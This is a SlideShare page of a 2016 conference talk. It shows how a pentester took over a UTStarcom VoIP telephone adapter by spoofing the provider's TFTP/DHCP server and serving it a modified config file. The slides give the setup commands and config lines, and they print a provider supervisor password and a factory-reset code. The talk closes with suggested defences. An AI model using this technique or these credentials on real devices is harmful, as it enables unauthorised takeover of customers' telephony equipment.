SlideShare uma empresa Scribd logo
O MAIOR EVENTO DE HACKING, SEGURANÇA
E TECNOLOGIA DO BRASIL DO CONTINENTE
Analysing VoIP Device
Behavior
Ygor Guimarães a.k.a r0gy153
INTRODUCTION
16/03/2016 3
#whoami
Ygor Guimarães a.k.a. Rogy153
18 years old
Brasil Pentest since 2012
Skill’s
Hardware
VoIP - Asterisk, Elastix, FreeSwitch
Bash
ATA (ANALOG TELEPHONE ADAPTER)
16/03/2016 5
ATA?
Common Scenario
Common Scenario
Victim
Manufacturer: UT Starcom
Model Name: iAN-02EX
GOAL: GAIN ACCESS TO ADMIN
PAGE
16/03/2016 10
Just press reset button?
Information Gathering
Sniffing
Sniffing
1. TFTP request
• GET U53V004.00.00_UTSTARCOM-GENERAL.CFG
• 200.153.153.107Provider config file server
How works
TFTP
Provider
Server
GET U53V004.00.00_UTSTARCOM-GENERAL.CFG
Searching config file
BINGO!
• Google search
Looking downloaded config
file
Downloaded Config File
[...]
provision_priority=1
provision_server_address=200.162.143.2
07
provision_server_port=69
provision_http_server_address=0
[...]
upgrade_server_address=200.162.143.207
upgrade_server_port=69
[...]
factoryreset=*#322867973738
[...]
supervisor_password=3L3N2Maxcom2411
[...]
Modified Config File
[...]
provision_priority=1
provision_server_address=0
provision_server_port=69
provision_http_server_address=0
[...]
upgrade_server_address=0
upgrade_server_port=69
[...]
factoryreset=*#322867973738
[...]
supervisor_password=rogy153hasbee
nhere
[...]
MITM
TFTP
I am
200.153.153.107
And i have
U53V004.00.00_UTSTARCOM-GENERAL.CFG
Provider
Server
What we need?
DHCP server
TFTP server
DHCP server
root@rogy153 ~ # apt-get install
dhcp3-server
root@rogy153 ~ # vim
/etc/dhcp/dhcpd.conf
DHCP server
subnet 200.153.153.0 netmask 255.255.255.0 {
range 200.153.153.1 200.153.153.254;
# option routers rtr-239-0-1.example.org
# rtr-239-0-2.example.org;
}
DHCP server
root@rogy153 ~#ifconfig eth0 200.153.153.107 netmask
255.255.255.0
TFTP server
root@rogy153 ~# apt-get install
tftpd-hpa
root@rogy153 ~# vim
/etc/default/tftpd-hpa
TFTP server
#/etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/utstar"
TFTP_ADDRESS="0.0.0.0:69"
TFTP_OPTIONS="--secure"
TFTP Test
root@rogy153:~# ls
root@rogy153:~#
root@rogy153:~# > /utstar/teste.txt
root@rogy153:~# tftp 200.153.153.207
tftp > get teste.txt
tftp > quit
root@rogy153:~#ls
teste.txt
It’s Works!
Uploading...
Uploading...
Authentication
Success!!!
Bonus
Other devices with same ‘feature’
Tools
Throwing Star LAN Tap
https://greatscottgadgets.com/throw
ingstar/
Wireshark
TFTP Server
DHCP Server
Solutions!?
HTTPS
XOR crypto
Filename hashing
Questions?
Contact
rogy153.blogspot.com
fb.com/ygorsza
@rogy153
ygor[at]brasilpentest[dot]com
Greet’s
Sl4y3r 0wn3r - slayerowner.blogspot.com
UNK-BR – unk-br.blogspot.com
SlackDummies – slackdummies.blogspot.com
M4dw0lf – m4dw0lf.wordpress.com
Obrigado!
#dontstophacking
ygor[at]brasilpentest[dot]com

Mais conteúdo relacionado

Mais procurados

Gps portable tracker tk102-2
Gps portable tracker tk102-2Gps portable tracker tk102-2
Gps portable tracker tk102-2
xxgpstraker
 
St58 t8vc specification-www.ttbvs.com
St58 t8vc specification-www.ttbvs.comSt58 t8vc specification-www.ttbvs.com
St58 t8vc specification-www.ttbvs.com
TTBVS
 
PRI Cards
PRI CardsPRI Cards
PRI Cards
Rajesh Erri
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?
Internet Security Auditors
 
Cisco spa508 data sheet
Cisco spa508   data sheetCisco spa508   data sheet
Cisco spa508 data sheet
kaka010
 
Gigaset N510 IP PRO VoIP/SIP DECT Base
Gigaset N510 IP PRO VoIP/SIP DECT BaseGigaset N510 IP PRO VoIP/SIP DECT Base
Gigaset N510 IP PRO VoIP/SIP DECT Base
Telephones Online
 
Raspberry pi 3
Raspberry pi 3Raspberry pi 3
Raspberry pi 3
Sanket Kakde
 
Everything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voipEverything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voip
PaloSanto Solutions
 

Mais procurados (8)

Gps portable tracker tk102-2
Gps portable tracker tk102-2Gps portable tracker tk102-2
Gps portable tracker tk102-2
 
St58 t8vc specification-www.ttbvs.com
St58 t8vc specification-www.ttbvs.comSt58 t8vc specification-www.ttbvs.com
St58 t8vc specification-www.ttbvs.com
 
PRI Cards
PRI CardsPRI Cards
PRI Cards
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?
 
Cisco spa508 data sheet
Cisco spa508   data sheetCisco spa508   data sheet
Cisco spa508 data sheet
 
Gigaset N510 IP PRO VoIP/SIP DECT Base
Gigaset N510 IP PRO VoIP/SIP DECT BaseGigaset N510 IP PRO VoIP/SIP DECT Base
Gigaset N510 IP PRO VoIP/SIP DECT Base
 
Raspberry pi 3
Raspberry pi 3Raspberry pi 3
Raspberry pi 3
 
Everything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voipEverything you never wanted to know about mobile voip
Everything you never wanted to know about mobile voip
 

Semelhante a Analysing VoIP Device Behavior - Roadsec Brasilia 2016

TheWheelCorpInfrastructure
TheWheelCorpInfrastructureTheWheelCorpInfrastructure
TheWheelCorpInfrastructureAndre Poggio
 
Implementation Case Study by eWBM
Implementation Case Study by eWBMImplementation Case Study by eWBM
Implementation Case Study by eWBM
FIDO Alliance
 
Media Files : Android's New Nightmare
Media Files :  Android's New NightmareMedia Files :  Android's New Nightmare
Media Files : Android's New Nightmare
Oguzhan Topgul
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
Yogesh Ojha
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
Sumutiu Marius
 
OpUtils webinar
OpUtils webinarOpUtils webinar
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
Amazon Web Services
 
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
Ivan Kravets
 
Blancco Bytes- Product Updates for ITADs
Blancco Bytes- Product Updates for ITADsBlancco Bytes- Product Updates for ITADs
Blancco Bytes- Product Updates for ITADs
Blancco
 
SwiftWing SIRIUS Datasheet
SwiftWing SIRIUS DatasheetSwiftWing SIRIUS Datasheet
SwiftWing SIRIUS Datasheet
Peter Koza
 
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
Seungjoo Kim
 
Basic Thin Clients
Basic Thin ClientsBasic Thin Clients
Basic Thin Clients
RDP Workstations Pvt Ltd
 
Fortinet_ProductGuide_NOV2021_R127.pdf
Fortinet_ProductGuide_NOV2021_R127.pdfFortinet_ProductGuide_NOV2021_R127.pdf
Fortinet_ProductGuide_NOV2021_R127.pdf
AlonzoJames2
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
PacSecJP
 
Windows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
Windows IoT: Accelerate the Intelligent Edge with the Windows AI PlatformWindows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
Windows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
Microsoft Tech Community
 
What is being exposed from IoT Devices
What is being exposed from IoT DevicesWhat is being exposed from IoT Devices
What is being exposed from IoT Devices
The Security of Things Forum
 
Hi Mom Enterprises LLC - System and Network
Hi Mom Enterprises LLC - System and NetworkHi Mom Enterprises LLC - System and Network
Hi Mom Enterprises LLC - System and NetworkJung Kim
 
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsxFortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
Alejandro Daricz
 
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
Takeda Pharmaceuticals
 

Semelhante a Analysing VoIP Device Behavior - Roadsec Brasilia 2016 (20)

TheWheelCorpInfrastructure
TheWheelCorpInfrastructureTheWheelCorpInfrastructure
TheWheelCorpInfrastructure
 
Implementation Case Study by eWBM
Implementation Case Study by eWBMImplementation Case Study by eWBM
Implementation Case Study by eWBM
 
Media Files : Android's New Nightmare
Media Files :  Android's New NightmareMedia Files :  Android's New Nightmare
Media Files : Android's New Nightmare
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
 
BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.BlackHat Hacking - Hacking VoIP.
BlackHat Hacking - Hacking VoIP.
 
OpUtils webinar
OpUtils webinarOpUtils webinar
OpUtils webinar
 
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
Update Microcontroller Devices Over-the-Air with Amazon FreeRTOS (IOT304-R1) ...
 
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
swampUP: Over-The-Air (OTA) firmware upgrades for Internet of Things devices ...
 
voip_en
voip_envoip_en
voip_en
 
Blancco Bytes- Product Updates for ITADs
Blancco Bytes- Product Updates for ITADsBlancco Bytes- Product Updates for ITADs
Blancco Bytes- Product Updates for ITADs
 
SwiftWing SIRIUS Datasheet
SwiftWing SIRIUS DatasheetSwiftWing SIRIUS Datasheet
SwiftWing SIRIUS Datasheet
 
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
 
Basic Thin Clients
Basic Thin ClientsBasic Thin Clients
Basic Thin Clients
 
Fortinet_ProductGuide_NOV2021_R127.pdf
Fortinet_ProductGuide_NOV2021_R127.pdfFortinet_ProductGuide_NOV2021_R127.pdf
Fortinet_ProductGuide_NOV2021_R127.pdf
 
Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2Yunusov babin 7 sins pres atm v2
Yunusov babin 7 sins pres atm v2
 
Windows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
Windows IoT: Accelerate the Intelligent Edge with the Windows AI PlatformWindows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
Windows IoT: Accelerate the Intelligent Edge with the Windows AI Platform
 
What is being exposed from IoT Devices
What is being exposed from IoT DevicesWhat is being exposed from IoT Devices
What is being exposed from IoT Devices
 
Hi Mom Enterprises LLC - System and Network
Hi Mom Enterprises LLC - System and NetworkHi Mom Enterprises LLC - System and Network
Hi Mom Enterprises LLC - System and Network
 
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsxFortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
Fortinet Mikulov 2020 -Jen chránit síť nestačí.ppsx
 
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
Hacker's and painters Hardware Hacking 101 - 10th Oct 2014
 

Último

一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
peuce
 
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
Peter Gallagher
 
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
PinkySharma900491
 
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
aozcue
 
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
aozcue
 
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
andreassenrolf537
 
web-tech-lab-manual-final-abhas.pdf. Jer
web-tech-lab-manual-final-abhas.pdf. Jerweb-tech-lab-manual-final-abhas.pdf. Jer
web-tech-lab-manual-final-abhas.pdf. Jer
freshgammer09
 

Último (7)

一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
一比一原版(UMich毕业证)密歇根大学|安娜堡分校毕业证如何办理
 
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
Building a Raspberry Pi Robot with Dot NET 8, Blazor and SignalR - Slides Onl...
 
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
MATHEMATICS BRIDGE COURSE (TEN DAYS PLANNER) (FOR CLASS XI STUDENTS GOING TO ...
 
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
一比一原版(IIT毕业证)伊利诺伊理工大学毕业证如何办理
 
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
一比一原版(UCSB毕业证)圣塔芭芭拉社区大学毕业证如何办理
 
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
欧洲杯冠军-欧洲杯冠军网站-欧洲杯冠军|【​网址​🎉ac123.net🎉​】领先全球的买球投注平台
 
web-tech-lab-manual-final-abhas.pdf. Jer
web-tech-lab-manual-final-abhas.pdf. Jerweb-tech-lab-manual-final-abhas.pdf. Jer
web-tech-lab-manual-final-abhas.pdf. Jer
 

Analysing VoIP Device Behavior - Roadsec Brasilia 2016